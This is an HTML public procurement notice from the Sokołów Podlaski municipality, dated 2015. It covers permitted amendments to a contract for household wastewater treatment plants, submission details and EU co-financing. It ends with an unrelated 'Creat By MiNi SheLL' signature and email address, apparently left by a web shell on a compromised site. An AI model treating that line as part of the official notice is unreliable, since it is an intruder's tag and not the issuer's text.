<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość dokonania zmian postanowień niniejszej umowy w przypadku:
1)	zmiany terminu wykonania zamówienia, jeżeli konieczność zmiany terminu nie wynika z przyczyn niezależnych od Wykonawcy takich jak: następstwa działań administracyjnych (konieczność uzyskania wyroku sądowego, innego orzeczenia sądu lub organu, którego konieczność nie przewidziano na etapie zawarcia umowy; istnienie podziemnych budowli lub infrastruktury; wydłużenie okresu gwarancji lub rękojmi o dowolny okres,
2)	zmian osób występujących po stronie Zamawiającego i Wykonawcy,
3)	zmiany adresu, lub siedziby Zamawiającego lub Wykonawcy,
4)	przedłużenia terminu realizacji umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego (w zakresie przekazania terenu budowy itp.) i będzie miało wpływ na wykonanie przedmiotu umowy, przedłużenie to może nastąpić wyłącznie o faktyczny czas opóźnienia,
5)	przedłużenia terminu realizacji umowy w przypadku wystąpienia opóźnień spowodowanych przez niesprzyjające warunki atmosferycznych lub inne siły natury uniemożliwiające czasową realizację inwestycji, przedłużenie to może nastąpić wyłącznie o faktyczny czas opóźnienia, 
6)	przedłużenia terminu realizacji umowy z powodu działań osób trzecich uniemożliwiających wykonanie prac, które nie są konsekwencją winy którejkolwiek ze stron, przedłużenie to może nastąpić wyłącznie o faktyczny czas opóźnienia,
7)	Zaniechania wykonania części robót - zmiana taka spowoduje zmniejszenie zakresu rzeczowego poprzez ograniczenie liczby instalowanych oczyszczalni ścieków w stosunku do przewidzianych w kontrakcie i związanych z tym robót towarzyszących w przypadku:
a)	braku zgody lub rezygnacji właściciela nieruchomości na przeprowadzenie robót budowlanych lub jeżeli wykonanie tych robót budowlanych stoi w sprzeczności z interesem osób prywatnych, dla których oczyszczalnia miała być wykonana,
b)	konieczność zaniechania robót budowlanych z uwagi na wystąpienie obiektywnych przyczyn technicznych lub innych nieprzewidzianych zdarzeń (np. śmierć właściciela nieruchomości) uniemożliwiających wybudowanie PBOŚ,
c)	wystąpienia innych prawnych lub technicznych okoliczności uniemożliwiających w sposób obiektywny wykonanie robót budowlanych będących przedmiotem umowy.
8)	Zmiany wartości wynagrodzenia ryczałtowego w przypadkach, o których mowa w ust. 1 pkt 6, tj. nie zrealizowania pełnego zakresu robót określonych w DOKUMENTACJI PROJEKTOWEJ i SIWZ. W przypadku zmniejszenia zakresu rzeczowego zmiana wartości wynagrodzenia będzie następowała proporcjonalnie do zmiany zakresu. Wartość realizacji jednej PBOŚ z uwzględnieniem rozdziału w zależności od ilości RLM zostanie wskazana w załączniku nr 2 Cena oferty oferty Wykonawcy i na podstawie tych danych będzie sporządzany aneks.
2.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminasokolowpodl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sokołów Podlaski, ul. Wolności 44,                                            
08-300 Sokołów Podlaski, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2015 godzina 11:45, miejsce: Urząd Gminy Sokołów Podlaski, ul. Wolności 44,                                            
08-300 Sokołów Podlaski, sekretariat - pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe Usługi dla Gospodarki i Ludności Wiejskiej objętego Programem Rozwoju Obszarów Wiejskich (PROW) na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com